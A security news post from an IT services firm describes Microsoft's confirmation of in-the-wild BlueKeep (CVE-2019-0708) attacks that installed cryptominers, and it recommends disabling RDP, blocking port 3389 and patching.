Microsoft Confirms BlueKeep Attacks, Calls Users to Patch to Prepare for More Damaging Attacks
Microsoft recently confirmed the ongoing BlueKeep attacks and warned that future BlueKeep attacks will likely be more damaging as systems remain unpatched.
What Is BlueKeep?
On May 14, 2019, Microsoft released an out-of-the-schedule patch for the security vulnerability CVE-2019-0708, also known as BlueKeep. This security vulnerability affects older versions of Windows, specifically Windows 7, Windows Server 2008 and Windows Server 2008 R2.
According to Microsoft, this security vulnerability, when left unpatched, is “wormable”, which means that any future malicious software (malware) that exploits this vulnerability could propagate from one vulnerable computer to another vulnerable computer in the same way that the WannaCry malware spread across the globe on May 12, 2017 – affecting hundreds of thousands of computers in less than 24 hours. BlueKeep has the potential to be wormable as malware that exploits this vulnerability attacks the Remote Desktop Protocol (RDP), which allows connection to another computer over a network connection.
BlueKeep is coined from two words “Blue” and “Keep”. Blue stands for the likelihood that exploitation would likely cause a “blue screen of death” of the affected Windows, rendering it to crash reboot; while the wormable exploit would likely lead to the Game of Thrones “Red Keep” moment.
The BlueKeep attacks were brought to light by security researchers Kevin Beaumontand Marcus Hutchins. To monitor BlueKeep attacks, Beaumont built honeypots in different parts of the world. Honeypots are computers that act as decoys, luring in attackers to study their attack methods.
Beaumont reported that last October 23rd, one of his Bluekeep honeypots crashed and rebooted and over the following weeks, except for one honeypot in Australia, all of the honeypots crashed and rebooted with increasing regularity. Beaumont shared the data of the BlueKeep honeypot crashes to Hutchins, who is best remembered as the person who single-handedly stopped the May 12, 2017 WannaCry malware from further spreading.
In a blog post for Kryptos Logic, Hutchins confirmed that the BlueKeep exploit that caused the crashes of the honeypots built by Beaumont is similar to the publicly available BlueKeep Metasploit. A metasploit is an attack framework for hacking into systems for testing purposes. The BlueKeep Metasploit was released on September 6, 2019.
Hutchins also confirmed that the ultimate goal of the BlueKeep exploit observed in the wild via Beaumont’s honeypots was to install a cryptomining malware, a malware that illicitly hijacks the computing power of someone else’s computer to mine a cryptocurrency.
BlueKeep Crashes and Cryptocurrency Malware Installation
Microsoft said that the crashes are “likely associated with the use of the unstable BlueKeep Metasploit module on certain sets of vulnerable machines”. The company said that Microsoft Defender ATP customers have been protected since early September of this year from BlueKeep Metasploit. This also allows the company to collect information regarding this attack.
According to Microsoft, since September 6, 2019, the day that BlueKeep Metasploit was released, it has observed an increased in RDP service crashes. Starting October 2019, the software company said it has also observed an increase in memory corruption crashes.
In both September 2019 and October 2019 BlueKeep attacks where the exploit didn’t cause the system to crash, Microsoft said a cryptomining malware was installed. This showed that the same malicious actors were likely responsible for both cryptomining campaigns, Microsoft said.
The software company added that it’s likely that the malicious actors behind the cryptomining campaigns have been actively staging cryptomining attacks and just incorporated the BlueKeep exploit into their arsenal. Microsoft said its Microsoft Defender ATP flagged the malicious installation of this crypromining malware on computers in France, Russia, Italy, Spain, Ukraine, Germany, the United Kingdom and many other countries.
According to Microsoft, the recorded BlueKeep attacks involved first scanning the internet for vulnerable internet-facing RDP services. Once these vulnerable internet-facing RDP services were found, attackers then used the BlueKeep Metasploit to run a PowerShell script that eventually downloaded and launched several other encoded PowerShell scripts and eventually load the cryptomining malware.
“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks,” Microsoft said. “In addition, while there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners.”
Preventive and Mitigating Measures Against BlueKeep
According to Beaumont, over 724,000 Windows computers worldwide are still unpatched and are left exposed over the internet for BlueKeep attacks.
Here are some of the preventive and mitigating measures against BlueKeep attacks:
1. Disable RDP
Because BlueKeep exploits vulnerable internet-facing RDP – a legitimate component of Windows operating system, a successful BlueKeep attack could leave no obvious traces. RDP is often left exposed to the public internet by suppliers and other third-parties that occasionally manage systems. To prevent BlueKeep attacks, it’s important to disable RDP completely. If RDP needs to be enabled, monitor network traffic and the logs for suspicious activity.
2. Block TCP Port 3389
Block TCP port 3389 on the firewall. Blocking this port will prevent unauthorized access from the internet.
3. Apply Patch
As long as systems remain unpatched, Microsoft said, BlueKeep will forever be a threat. It’s, therefore, important to patch your organization’s Windows operating systems.
We offer a fast 30-minute response to mitigate the IT risks such as BlueKeep and beyond. Call us today (416) 920-3000 or email firstname.lastname@example.org and protect your organizational IT.